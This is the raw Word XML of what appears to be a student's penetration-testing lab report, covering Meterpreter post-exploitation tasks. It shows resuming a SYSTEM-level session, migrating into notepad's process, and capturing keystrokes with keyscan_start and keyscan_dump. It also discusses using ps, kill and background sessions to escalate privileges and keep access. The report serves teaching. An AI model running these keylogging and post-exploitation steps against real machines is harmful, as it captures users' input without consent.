    <w:p w14:paraId="49EBF7D4" w14:textId="6585F3E5" w:rsidR="00941781" w:rsidRDefault="00E56474" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Check available sessions (may have more than one backgrounded session) and pick the desired session to resume:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F101D92" w14:textId="3506FA1C" w:rsidR="00E56474" w:rsidRDefault="00E56474" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B86DDA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF27B8E"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247AC44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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C90C39"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>===============</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE6A92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4EF4B4E1"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Information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Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCC0910"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5A845ED0" w14:textId="2F9ECA24"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3</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NT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> AUTHORITY\SYSTEM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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2BDBD2BA8</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p>
    <w:p w14:paraId="23362DA7" w14:textId="79BDA0EA"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4</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NT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> AUTHORITY\SYSTEM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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2BDBD2BA8</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p>
    <w:p w14:paraId="70821C35"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4A811477" w14:textId="4E0EC439"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 </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 xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E56474">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E56474">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Resumes session</w:t>
      </w:r>
      <w:r w:rsidR="00665469">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FAF2C5"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Starting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> interaction </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>with</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p>
    <w:p w14:paraId="3A404BBB"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1DB44B29" w14:textId="4FA60871" w:rsidR="00E56474" w:rsidRPr="00E56474" w:rsidRDefault="00E56474" w:rsidP="00E5647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67B5D8B0" w14:textId="62962AB0" w:rsidR="00E56474" w:rsidRDefault="00E56474" w:rsidP="00E56474">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc20508505"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 6:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="35F09CAC" w14:textId="2A17F3C9" w:rsidR="00E56474" w:rsidRDefault="00E56474" w:rsidP="00E56474">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56474">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What are the Meterpreter commands to capture the keys pressed by the target machine?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F033DE" w14:textId="6102C149" w:rsidR="00E56474" w:rsidRDefault="00E56474" w:rsidP="00E56474">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41BDEE41" w14:textId="3FA9D571" w:rsidR="00E56474" w:rsidRDefault="008B560C" w:rsidP="00334CCC">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The commands to capture the keys pressed by the target machine include the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>keyscan_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>keyscan_dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. However, to sniff the keystrokes for a specific process the pen tester first needs to migrate the server to the target process. Here is an example that sniffs the keystrokes of notepad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716E326E" w14:textId="2B9192C2" w:rsidR="008B560C" w:rsidRDefault="008B560C" w:rsidP="00E56474">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB7EC6E" w14:textId="477B43C1" w:rsidR="008B560C" w:rsidRDefault="008B560C" w:rsidP="00E56474">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidR="00C37643">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C37643">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Notepad’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">PID was acquired using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command in Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE315D5" w14:textId="48C97A99" w:rsidR="00C37643" w:rsidRDefault="00C37643" w:rsidP="00E56474">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3973F952"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migrate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1460</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31308E10"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Migrating</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r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>992</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1460.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC6DC65"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Migration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> completed successfully</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01EDB4"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keyscan_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B08D227"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Starting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the keystroke sniffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C73121D"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keyscan_dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="558AA43F"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Dumping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> captured keystrokes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CBEA31"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&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E42375"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> should work now</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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Right</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p>
    <w:p w14:paraId="02310830"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E13D442"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36B20B04" w14:textId="49C2B202" w:rsidR="00C37643" w:rsidRPr="00C37643" w:rsidRDefault="00C37643" w:rsidP="00C3764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747120D6" w14:textId="792D3594" w:rsidR="00C37643" w:rsidRDefault="00C37643" w:rsidP="00C37643">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc20508506"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 7:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="566D5C29" w14:textId="14BA1EE7" w:rsidR="00C37643" w:rsidRDefault="00C37643" w:rsidP="00C37643">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37643">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What is the command to get the running processes in the target machine? Why is it useful according to your opinion?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43404209" w14:textId="13321D01" w:rsidR="00C37643" w:rsidRDefault="00C37643" w:rsidP="00C37643">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="048F58A7" w14:textId="7C860F44" w:rsidR="00C37643" w:rsidRDefault="00C37643" w:rsidP="00334CCC">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The command to get the running processes in the target machine is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">command. As mentioned above in task 6, if we want to sniff the keystrokes of a specific process then we need to migrate the server to that specific process first, then start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>keyscan_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">command. Another reason why knowing what processes are running is useful, is because you can gather information on what the target system is used for by the list of processes that its running. Moreover, the pen tester can also terminate any of the listed processes with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37643">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>command to wreak havoc in the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786392E5" w14:textId="1F076057" w:rsidR="00C37643" w:rsidRDefault="00C37643" w:rsidP="00C37643">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7907BAE6" w14:textId="742A07E5" w:rsidR="00C37643" w:rsidRDefault="00C37643" w:rsidP="00C37643">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc20508507"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 8:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="0B7DC04D" w14:textId="638A698A" w:rsidR="00C37643" w:rsidRDefault="00562759" w:rsidP="00C37643">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00C37643" w:rsidRPr="00C37643">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ithout performing any extra exploit explain, according to your opinion, why would you need to background the current Meterpreter session in order to perform another task? What would this task be in relation to the current Meterpreter session?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFFB67D" w14:textId="49992BC7" w:rsidR="00562759" w:rsidRDefault="00562759" w:rsidP="00C37643">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2071B2" w14:textId="1D8EE0BE" w:rsidR="00610FFF" w:rsidRDefault="00665469" w:rsidP="00610FFF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">There might be different reasons to put the current Meterpreter session in the background. In class we </w:t>
      </w:r>
      <w:r w:rsidR="00610FFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>discussed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> about the post-exploitation </w:t>
      </w:r>
      <w:r w:rsidR="00610FFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>stage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00232DF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>in penetration test</w:t>
      </w:r>
      <w:bookmarkStart w:id="12" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidR="00232DF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">ing. Having a Meterpreter session verifies that you have obtained shell access. However, this only means that we have a small foothold in the system and with minimal privileges. </w:t>
      </w:r>
      <w:r w:rsidR="00610FFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00232DF4" w:rsidRPr="00232DF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidR="00A83F58">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00232DF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory in Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00610FFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> p</w:t>
      </w:r>
      <w:r w:rsidR="00232DF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>otentially</w:t>
      </w:r>
      <w:r w:rsidR="00610FFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> has</w:t>
      </w:r>
      <w:r w:rsidR="00232DF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> that would </w:t>
      </w:r>
      <w:r w:rsidR="00334CCC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>allow</w:t>
      </w:r>
      <w:r w:rsidR="00232DF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> us to escalate privileges, maintain access, etc. </w:t>
      </w:r>
      <w:r w:rsidR="00610FFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">once the Meterpreter session is in the background. </w:t>
      </w:r>
      <w:r w:rsidR="00232DF4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Having mentioned that, this task would be the post-exploitation task </w:t>
      </w:r>
      <w:r w:rsidR="00A83F58">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>in relation to the current Meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109FF137" w14:textId="49AC473C" w:rsidR="00562759" w:rsidRDefault="00562759" w:rsidP="00562759">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc20508508"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 4: Custom Payloads and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DC8BCBF" w14:textId="28FDBE8F" w:rsidR="00562759" w:rsidRDefault="00562759" w:rsidP="00562759"/>
    <w:p w14:paraId="29843F41" w14:textId="2663D106" w:rsidR="00562759" w:rsidRPr="00562759" w:rsidRDefault="00562759" w:rsidP="00562759">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
